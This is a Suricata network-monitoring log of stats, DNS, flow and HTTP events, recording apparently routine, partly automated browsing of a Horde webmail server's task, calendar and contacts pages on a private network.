{"timestamp":"2020-02-29T00:16:22.000202+0000","event_type":"stats","stats":{"uptime":14634,"capture":{"kernel_packets":136088,"kernel_drops":0},"decoder":{"pkts":136097,"bytes":93608368,"invalid":188,"ipv4":134582,"ipv6":8,"ethernet":136097,"raw":0,"null":0,"sll":0,"tcp":129203,"udp":5176,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2795,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2811,"synack":2802,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1834,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2367,"failed_udp":112},"tx":{"http":4698,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2447}},"flow_mgr":{"closed_pruned":2776,"new_pruned":15,"est_pruned":2412,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":0,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22811,"memcap_state":0,"memcap_global":0},"http":{"memuse":78873,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:22.722948+0000","flow_id":1032113613812835,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52764,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=t178Jy_bOFAgZYI5pak0cNw&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":37},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":17,"tx_id":0}} {"timestamp":"2020-02-29T00:16:23.000656+0000","flow_id":909784335920538,"event_type":"flow","src_ip":"192.168.10.122","src_port":46116,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:22.863642+0000","end":"2020-02-29T00:11:22.975027+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:25.337206+0000","flow_id":1151071323182789,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34852,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/saveEvent","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 
Safari\/537.36","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/saveEvent","state":"CLOSED","stored":false,"size":434,"tx_id":0}} {"timestamp":"2020-02-29T00:16:27.000653+0000","flow_id":788838057176103,"event_type":"flow","src_ip":"192.168.10.122","src_port":46659,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:26.519207+0000","end":"2020-02-29T00:11:26.627443+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:28.391364+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":60209,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":17844,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:28.496615+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60209,"proto":"UDP","dns":{"type":"answer","id":17844,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:28.496615+0000","flow_id":1047128820218052,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":60209,"proto":"UDP","dns":{"type":"answer","id":17844,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:28.663260+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6989}} {"timestamp":"2020-02-29T00:16:29.000167+0000","event_type":"stats","stats":{"uptime":14641,"capture":{"kernel_packets":136099,"kernel_drops":0},"decoder":{"pkts":136107,"bytes":93608932,"invalid":188,"ipv4":134588,"ipv6":8,"ethernet":136107,"raw":0,"null":0,"sll":0,"tcp":129209,"udp":5176,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2795,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2811,"synack":2802,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1834,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2367,"failed_udp":112},"tx":{"http":4698,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2447}},"flow_mgr":{"closed_pruned":2776
,"new_pruned":15,"est_pruned":2413,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22481,"memcap_state":0,"memcap_global":0},"http":{"memuse":86471,"memcap":0}}} {"timestamp":"2020-02-29T00:16:32.000456+0000","flow_id":480248952220453,"event_type":"flow","src_ip":"192.168.10.122","src_port":48196,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:31.748325+0000","end":"2020-02-29T00:11:31.856514+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:32.015430+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50103,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13482,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:32.120707+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50103,"proto":"UDP","dns":{"type":"answer","id":13482,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:32.120707+0000","flow_id":1852138835688518,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50103,"proto":"UDP","dns":{"type":"answer","id":13482,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:16:32.186700+0000","flow_id":571869214283118,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34856,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8565}} {"timestamp":"2020-02-29T00:16:32.229983+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34854,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6989},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":37034,"tx_id":0}} {"timestamp":"2020-02-29T00:16:32.237663+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":50780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":33890,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:32.345816+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50780,"proto":"UDP","dns":{"type":"answer","id":33890,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:32.345816+0000","flow_id":291687022764127,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":50780,"proto":"UDP","dns":{"type":"answer","id":33890,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:32.397865+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34854,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3982}} {"timestamp":"2020-02-29T00:16:33.000734+0000","flow_id":1221616157382490,"event_type":"flow","src_ip":"192.168.10.81","src_port":52760,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":13,"pkts_toclient":19,"bytes_toserver":1826,"bytes_toclient":18270,"start":"2020-02-29T00:15:24.907098+0000","end":"2020-02-29T00:15:32.654799+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:16:35.000336+0000","flow_id":16980894975856,"event_type":"flow","src_ip":"192.168.10.122","src_port":59771,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:34.034672+0000","end":"2020-02-29T00:11:34.142465+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:16:36.000252+0000","event_type":"stats","stats":{"uptime":14648,"capture":{"kernel_packets":136127,"kernel_drops":0},"decoder":{"pkts":136159,"bytes":93634934,"invalid":188,"ipv4":134640,"ipv6":8,"ethernet":136159,"raw":0,"null":0,"sll":0,"tcp":129255,"udp":5182,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097632},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2797,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2813,"synack":2804,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1836,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2370,"failed_udp":112},"tx":{"http":4701,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2450}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2415,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":22481,"memcap_state":0,"memcap_global":0},"http":{"memuse":138193,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:37.000848+0000","flow_id":1911890401320261,"event_type":"flow","src_ip":"192.168.10.122","src_port":60822,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:36.023877+0000","end":"2020-02-29T00:11:36.132194+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:37.187349+0000","flow_id":571869214283118,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34856,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8565},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34651,"tx_id":0}} {"timestamp":"2020-02-29T00:16:37.399118+0000","flow_id":745403072685010,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34854,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3982},"app_proto":"http","fileinfo":{"filename":"\/turba\/","state":"CLOSED","stored":false,"size":19150,"tx_id":1}} 
{"timestamp":"2020-02-29T00:16:38.401616+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39052,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":47432,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:38.507038+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39052,"proto":"UDP","dns":{"type":"answer","id":47432,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:38.507038+0000","flow_id":2129426219671760,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39052,"proto":"UDP","dns":{"type":"answer","id":47432,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:38.630480+0000","flow_id":101213813529097,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34858,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18989}} {"timestamp":"2020-02-29T00:16:39.000242+0000","flow_id":402321488552,"event_type":"flow","src_ip":"192.168.10.122","src_port":34159,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:38.244392+0000","end":"2020-02-29T00:11:38.352829+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:16:40.000319+0000","flow_id":1991905642280549,"event_type":"flow","src_ip":"192.168.10.122","src_port":57395,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.390757+0000","end":"2020-02-29T00:11:39.498900+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000701+0000","flow_id":787184495559925,"event_type":"flow","src_ip":"192.168.10.122","src_port":53470,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.525557+0000","end":"2020-02-29T00:11:39.634046+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:40.000814+0000","flow_id":2068545038709269,"event_type":"flow","src_ip":"192.168.10.122","src_port":46427,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:39.193045+0000","end":"2020-02-29T00:11:39.301552+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:41.000604+0000","flow_id":1085409844794818,"event_type":"flow","src_ip":"192.168.10.122","src_port":48282,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:11:40.136642+0000","end":"2020-02-29T00:11:40.244904+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:16:43.000228+0000","event_type":"stats","stats":{"uptime":14655,"capture":{"kernel_packets":136170,"kernel_drops":0},"decoder":{"pkts":136197,"bytes":93657469,"invalid":188,"ipv4":134677,"ipv6":9,"ethernet":136197,"raw":0,"null":0,"sll":0,"tcp":129290,"udp":5184,"sctp":0,"icmpv4":15,"icmpv6":9,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":687,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10003,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096480},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2798,"ssn_memcap_drop":0,"pseudo":348,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2814,"synack":2805,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":143,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1837,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2371,"failed_udp":112},"tx":{"http":4702,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2451}},"flow_mgr":{"closed_pruned":2777,"new_pruned":15,"est_pruned":2421,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":1,"flows_timeout":3,"flows_timeout_inuse":0,"flows_removed":3,"rows_checked":65536,"rows_skipped":65531,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":20827,"memcap_state":0,"memcap_global":0},"http":{"memuse":154227,"memcap":0}}} 
{"timestamp":"2020-02-29T00:16:43.001275+0000","flow_id":921415108703488,"event_type":"flow","src_ip":"192.168.10.122","src_port":59394,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:11:42.767232+0000","end":"2020-02-29T00:11:42.875378+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:16:43.634753+0000","flow_id":101213813529097,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34858,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/add.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":18989},"app_proto":"http","fileinfo":{"filename":"\/turba\/add.php","state":"TRUNCATED","stored":false,"size":106496,"tx_id":0}} {"timestamp":"2020-02-29T00:16:44.041696+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":33837,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":4784,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:44.146676+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33837,"proto":"UDP","dns":{"type":"answer","id":4784,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:44.146676+0000","flow_id":1224712834032352,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":33837,"proto":"UDP","dns":{"type":"answer","id":4784,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:44.262516+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":39917,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13646,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:44.370968+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39917,"proto":"UDP","dns":{"type":"answer","id":13646,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:16:44.370968+0000","flow_id":1932166962086260,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":39917,"proto":"UDP","dns":{"type":"answer","id":13646,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:47.177191+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53483,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":28552,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:16:47.282104+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53483,"proto":"UDP","dns":{"type":"answer","id":28552,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:16:47.282104+0000","flow_id":1731686478885927,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53483,"proto":"UDP","dns":{"type":"answer","id":28552,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:16:47.299997+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45}} {"timestamp":"2020-02-29T00:16:47.299997+0000","flow_id":363769459871467,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34860,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/horde\/imple?token=zwiFi46-w1WbjcxymnmTfV7&app=nag&imple=Nag_Ajax_Imple_TagAutoCompleter&input=tags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/nag\/task.php?actionID=add_task","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":45},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/horde\/imple","state":"CLOSED","stored":false,"size":16,"tx_id":0}} 
